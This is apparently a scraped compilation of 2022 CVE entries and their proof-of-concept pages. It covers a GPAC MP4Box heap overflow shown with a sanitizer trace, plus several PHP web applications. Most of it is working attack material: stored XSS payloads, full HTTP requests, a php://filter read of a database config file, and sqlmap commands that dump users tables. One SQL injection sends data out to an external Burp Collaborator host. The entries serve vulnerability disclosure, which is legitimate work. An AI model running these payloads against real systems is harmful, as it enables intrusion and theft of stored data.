GPAC mp4box 1.1.0-DEV-rev1759-geb2d1e6dd-has a heap-buffer-overflow vulnerability in function gf_isom_apple_enum_tag.

**Description**

There is a heap buffer overflow detected by AddressSanitizer

**System info**

    Ubuntu 20.04.2 LTS
    clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71
    MP4Box - GPAC version 1.1.0-DEV-rev1759-geb2d1e6dd-master
    

**Build command**

    ./configure --static-mp4box --prefix=`realpath ./install` --enable-sanitizer --cc=clang --cxx=clang++
    

**crash command**

    MP4Box -frag 1 -out /dev/null poc_file
    

**Pocs**

poc.zip

**Crash output**

    ==36294==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000014f5 at pc 0x0000007ed95d bp 0x7fff9dbe5110 sp 0x7fff9dbe5108
    READ of size 1 at 0x6020000014f5 thread T0
        #0 0x7ed95c in gf_isom_apple_enum_tag /programs/mp4box/builds/build15/src/isomedia/isom_read.c:4347:9
        #1 0x1578ec6 in isor_declare_track /programs/mp4box/builds/build15/src/filters/isoffin_load.c:787:8
        #2 0x1583b47 in isor_declare_objects /programs/mp4box/builds/build15/src/filters/isoffin_load.c:1453:3
        #3 0xd05c0d in isoffin_initialize /programs/mp4box/builds/build15/src/filters/isoffin_read.c:485:8
        #4 0xb74a43 in gf_filter_new_finalize /programs/mp4box/builds/build15/src/filter_core/filter.c:441:8
        #5 0xb73120 in gf_filter_new /programs/mp4box/builds/build15/src/filter_core/filter.c:395:7
        #6 0xb5e1bb in gf_fs_load_filter_internal /programs/mp4box/builds/build15/src/filter_core/filter_session.c:1293:13
        #7 0x911528 in gf_media_fragment_file /programs/mp4box/builds/build15/src/media_tools/isom_tools.c:3789:6
        #8 0x4e6fdc in mp4boxMain /programs/mp4box/builds/build15/applications/mp4box/main.c:6439:7
        #9 0x7f7b5af220b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #10 0x41ea6d in _start (/programs/mp4box/builds/build15/bin/gcc/MP4Box+0x41ea6d)
    
    0x6020000014f5 is located 0 bytes to the right of 5-byte region [0x6020000014f0,0x6020000014f5)
    allocated by thread T0 here:
        #0 0x499ccd in malloc (/programs/mp4box/builds/build15/bin/gcc/MP4Box+0x499ccd)
        #1 0x12c648d in databox_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_apple.c:247:22
        #2 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #3 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #4 0x12c53c3 in ilst_item_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_apple.c:114:7
        #5 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #6 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #7 0x12c4d35 in ilst_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_apple.c:47:8
        #8 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #9 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #10 0x7affe3 in gf_isom_box_array_read_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1719:7
        #11 0x132290a in meta_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_meta.c:106:13
        #12 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #13 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #14 0x7affe3 in gf_isom_box_array_read_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1719:7
        #15 0x12f6245 in udta_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_base.c:8075:13
        #16 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #17 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #18 0x7affe3 in gf_isom_box_array_read_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1719:7
        #19 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #20 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #21 0x7ad3c1 in gf_isom_parse_root_box /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:38:8
        #22 0x7c8dc1 in gf_isom_parse_movie_boxes_internal /programs/mp4box/builds/build15/src/isomedia/isom_intern.c:351:7
        #23 0x7c8dc1 in gf_isom_parse_movie_boxes /programs/mp4box/builds/build15/src/isomedia/isom_intern.c:814:6
        #24 0x7cd1a6 in gf_isom_open_file /programs/mp4box/builds/build15/src/isomedia/isom_intern.c:934:19
        #25 0x4e14d6 in mp4boxMain /programs/mp4box/builds/build15/applications/mp4box/main.c:5968:12
        #26 0x7f7b5af220b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /programs/mp4box/builds/build15/src/isomedia/isom_read.c:4347:9 in gf_isom_apple_enum_tag
    Shadow bytes around the buggy address:
      0x0c047fff8240: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 00 00
      0x0c047fff8250: fa fa 00 00 fa fa 00 00 fa fa 00 04 fa fa 00 fa
      0x0c047fff8260: fa fa 00 00 fa fa 00 00 fa fa 01 fa fa fa 00 00
      0x0c047fff8270: fa fa 00 05 fa fa 00 00 fa fa 00 01 fa fa 00 00
      0x0c047fff8280: fa fa 00 00 fa fa 02 fa fa fa 00 00 fa fa 00 02
    =>0x0c047fff8290: fa fa 00 00 fa fa 00 04 fa fa 00 00 fa fa[05]fa
      0x0c047fff82a0: fa fa 00 00 fa fa 02 fa fa fa 00 00 fa fa 00 fa
      0x0c047fff82b0: fa fa 00 00 fa fa 00 00 fa fa 06 fa fa fa 00 00
      0x0c047fff82c0: fa fa 02 fa fa fa 00 00 fa fa 02 fa fa fa 00 00
      0x0c047fff82d0: fa fa 03 fa fa fa 00 00 fa fa 02 fa fa fa 00 00
      0x0c047fff82e0: fa fa 00 00 fa fa 00 03 fa fa 00 00 fa fa 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==36294==ABORTING

CVE-2022-27146: There is a heap buffer overflow detected by AddressSanitizer · Issue #2120 · gpac/gpac

Social Codia SMS v1 was discovered to contain an arbitrary file upload vulnerability via addteacher.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27349: GitHub - D4rkP0w4r/sms-Unrestricted-File-Upload-RCE-POC

Ecommerce-Website v1 was discovered to contain an arbitrary file upload vulnerability via /customer_register.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27357: CVEs/POC.md at main · D4rkP0w4r/CVEs

Musical World v1 was discovered to contain an arbitrary file upload vulnerability via uploaded_songs.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27064: GitHub - D4rkP0w4r/Musical-World-Unrestricted-File-Upload-RCE-POC

AeroCMS v0.0.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via view_all_comments.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comments text field.

**AeroCMS-Comment-Stored\_XSS-POC**

*   `Note` => Don't need register or login account
*   `Description` => `Stored_XSS` at comment box

**Step to Reproduct**

*   Click `Read More` -> input payload `<img/src/onerror=prompt(10)>` at `Author` -> click `Submit` button

**Exploit****Vulnerable Code****POC**

*   `Injection Point`

comment\_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment\_email=bin%40gmail.com&comment\_content=hacked&create\_comment=

*   `Request`

POST /AeroCMS/post.php?p\_id=36 HTTP/1.1
Host: localhost:8080
Content-Length: 126
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/AeroCMS/post.php?p\_id=36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441
Connection: close

comment\_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment\_email=bin%40gmail.com&comment\_content=hacked&create\_comment=

`POC VIDEO` https://drive.google.com/file/d/1GxOyX1JkG0trfdaCLfe06TR6WLIGoUXE/view?usp=sharing

CVE-2022-27063: GitHub - D4rkP0w4r/AeroCMS-Comment-Stored_XSS-Poc

Social Codia SMS v1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via add_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Post Title text field.

**sms-Add\_Student-Stored\_XSS-POC**

Description => Stored\_XSS at `Add Student`

**Step to Reproduct**

*   Login to admin -> `Students` -> `Add Student` -> input payload `<img/src/onerror=prompt(10)>` at `Enter Name`

**Exploit**

![image](https://user-images.githubusercontent.com/79050415/158715096-7fe6c540-b7cb-4293-b60f-f0e16b6d445c.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/158716291-52718f20-b719-44ef-a9ca-21b00e82b2de.png)

*   When inserting into the database, the input is not filtered out bad characters

**POC**

*   `Injection Point`

\------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="name"

<img/src/onerror=prompt(10)>

*   `Request`

POST /sms/admin/addstudent.php HTTP/1.1
Host: localhost:8080
Content-Length: 992
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAvKt9LM2RnnkuA0K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/sms/admin/addstudent.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k
Connection: close

------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="image"; filename="car.png"
Content-Type: application/octet-stream


------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="rollno"

1234567
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="name"

<img/src/onerror=prompt(10)>
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="contact"

123456
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="standerd"

1
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="city"

Newyork
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="email"

haha@gmail.com
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="gender"

male
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="submit"

------WebKitFormBoundaryAvKt9LM2RnnkuA0K--

`POC VIDEO` https://drive.google.com/file/d/1PLRmIi7EBMAXkLMUhUy09PVph1CW6otF/view?usp=sharing

CVE-2022-27348: GitHub - D4rkP0w4r/sms-Add_Student-Stored_XSS-POC

Movie Seat Reservation v1 was discovered to contain an unauthenticated file disclosure vulnerability via /index.php?page=home.

Permalink

Cannot retrieve contributors at this time

**Movie Seat Reservation System File Disclosure**

*   `Note` => don't need login

**Exploit**

*   Exploit with Burp Suite

http://192.168.1.101:8080/Movie\_Seat\_Reservation\_System/index.php?page\=home

![image](https://user-images.githubusercontent.com/79050415/160242883-2539e290-9b33-4267-a38b-a2d37563b0a2.png)

*   Use Burp Suite capture request and payload => `Send` ![image](https://user-images.githubusercontent.com/79050415/160242922-7c29a7ac-787f-47b8-9052-6c5c2d7495cb.png)
*   Then decode `Base64`

 PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywndGhlYXRlcl9kYicpb3IgZGllKCJDb3VsZCBub3QgY29ubmVjdCB0byBteXNxbCIubXlzcWxpX2Vycm9yKCRjb24pKTsNCg\==    

![image](https://user-images.githubusercontent.com/79050415/160243014-eff96877-37c4-41ba-b4ed-0359cbbece7b.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/160243179-1a4d1053-eb75-4a8c-9965-52d3eaeb5b18.png)

*   `Request`

GET /Movie\_Seat\_Reservation\_System/index.php?page\=php://filter/convert.base64\-encode/resource\=admin/db\_connect HTTP/1.1
Host: 192.168.1.101:8080
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.1.101:8080/Movie\_Seat\_Reservation\_System/
Accept\-Encoding: gzip, deflate
Accept\-Language: en\-US,en;q\=0.9
Cookie: PHPSESSID\=0722dtqnb1dgvuono8uubajcae
Connection: close

CVE-2022-28002: CVEs/POC.md at main · D4rkP0w4r/CVEs

Online Banking System in PHP v1 was discovered to contain multiple SQL injection vulnerabilities at /staff_login.php via the Staff ID and Staff Password parameters.

Permalink

Cannot retrieve contributors at this time

**Online Banking System SQL Injection**

*   `Description` => sql injection at `staff_login.php`

**Step to Reproduct**

*   `Staff Login` -> `Staff ID` \-> `Staff Password` -> `Login` -> `modify data` -> `Sqlmap`

**Exploit**

python3 sqlmap.py -r sqli.txt --batch --current-user

![image](https://user-images.githubusercontent.com/79050415/159328722-52415c05-ed4a-405b-ae9f-919692f58601.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/159329104-f6734379-6e0f-4344-a7a9-d4baa41d2e34.png)

*   No filter `Staff ID` and `Staff Password` when inserting data to database

**Information Disclosure**

![image](https://user-images.githubusercontent.com/79050415/159337062-c4045649-7665-4691-9a51-3d41d502d14e.png)

`Injection Point`

staff\_id=\*&password=hhhhhhhhhh&staff\_login-btn=LOGIN

*   `Request`

POST /Online-Banking/staff\_login.php HTTP/1.1
Host: 192.168.1.101:8080
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.101:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Online-Banking/staff\_login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jpkpok9b1tiholm7srir1b6mev
Connection: close

staff\_id=\*&password=hhhhhhhhhh&staff\_login-btn=LOGIN

CVE-2022-27991: CVEs/POC.md at main · D4rkP0w4r/CVEs

Car Rental System v1.0 was discovered to contain a SQL injection vulnerability at /Car_Rental/booking.php via the id parameter.

Permalink

Cannot retrieve contributors at this time

**Car Rental System SQL Injection**

*   `Note` => Login to customer
*   `Injection Point` => `http://192.168.1.101:8080/Car_Rental/booking.php?id=1`

**Exploit**

*   Exploit with `Sqlmap` + `Burp Suite` ![image](https://user-images.githubusercontent.com/79050415/159719099-d87a540c-b90f-49ca-8377-36bd97a4314e.png)
*   Use `Burp Suite` capture request
*   Then save as `sqlicar.txt`

GET /Car\_Rental/booking.php?id=1 HTTP/1.1
Host: 192.168.1.101:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Car\_Rental/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ci\_session=jo7rsp3d4su5223o11544otrc44odm2l; PHPSESSID=5cddkjjvh5nhvqh96t306gau8b
Connection: close

*   Exploit with `Sqlmap`

 python3 sqlmap.py -r sqlicar.txt --current-db

![image](https://user-images.githubusercontent.com/79050415/159721152-f8a48ce3-3cde-4743-bb4a-babb858e9e48.png)

python3 sqlmap.py \-r sqlicar.txt \-D carrentalp \-\-tables

![image](https://user-images.githubusercontent.com/79050415/159719187-a0e7785b-ddf4-4581-a7ca-75e3343f4b49.png)

**Information Disclosure**

![image](https://user-images.githubusercontent.com/79050415/159721411-55b6bdde-6ad6-4490-ac0e-a96e1a7bd1f7.png) ![image](https://user-images.githubusercontent.com/79050415/159721455-10c52b03-bc77-4aaf-8de1-684a30af17b7.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/159724951-39b8fd8b-9a6d-4797-846e-ca69b7767a8e.png)

*   No filter `id` when inserting data to database

CVE-2022-28000: CVEs/POC.md at main · D4rkP0w4r/CVEs

Movie Seat Reservation v1 was discovered to contain a SQL injection vulnerability at /index.php?page=reserve via the id parameter.

Permalink

Cannot retrieve contributors at this time

**Movie Seat Reservation System Sql Injection**

*   `Note` => exploit don't need login account

**Exploit**

*   Use Burp Suite capture request with payload ![image](https://user-images.githubusercontent.com/79050415/160153517-9ff10b72-e677-428d-b92b-9588f9e0bda7.png)

GET /Movie\_Seat\_Reservation\_System/index.php?page\=reserve&id\=(select%20load\_file('%5c%5c%5c%5coumvuo0qifuf18d8xd3vrtn81z7svqjhl5cs3gs.burpcollaborator.net%5c%5cbxr')) HTTP/1.1
Host: 192.168.1.101:8080
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Upgrade\-Insecure\-Requests: 1
Accept\-Encoding: gzip, deflate
Accept\-Language: en\-US,en\-GB;q\=0.9,en;q\=0.8
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Connection: close
Cache\-Control: max\-age\=0

Then save as `moviesqli.txt`

*   Exploit with `Sqlmap`

python3 sqlmap.py \-r moviesqli.txt \-\-current\-user

![image](https://user-images.githubusercontent.com/79050415/160154272-be4be6b5-64a1-495c-937e-65f50c2de43d.png)

python3 sqlmap.py \-r moviesqli.txt  \-\-batch \-dbs

![image](https://user-images.githubusercontent.com/79050415/160154484-41d6fc43-fd58-4180-9b60-440a554befc4.png)

python3 sqlmap.py \-r moviesqli.txt  \-\-batch \-tables \-D theater\_db

![image](https://user-images.githubusercontent.com/79050415/160154696-86ce3ceb-c2f3-4d58-b095-afd061e89ad3.png)

python3 sqlmap.py \-r moviesqli.txt  \-\-batch \-columns \-D theater\_db \-T users \-dump

![image](https://user-images.githubusercontent.com/79050415/160154865-82a9b67a-e37d-4cb1-aad2-76df5a18c5f5.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/160155334-4b64f616-2719-4e99-a8e0-dcbec0d42ea1.png)

*   No filter `id` when inserting data to database

Tag

#apple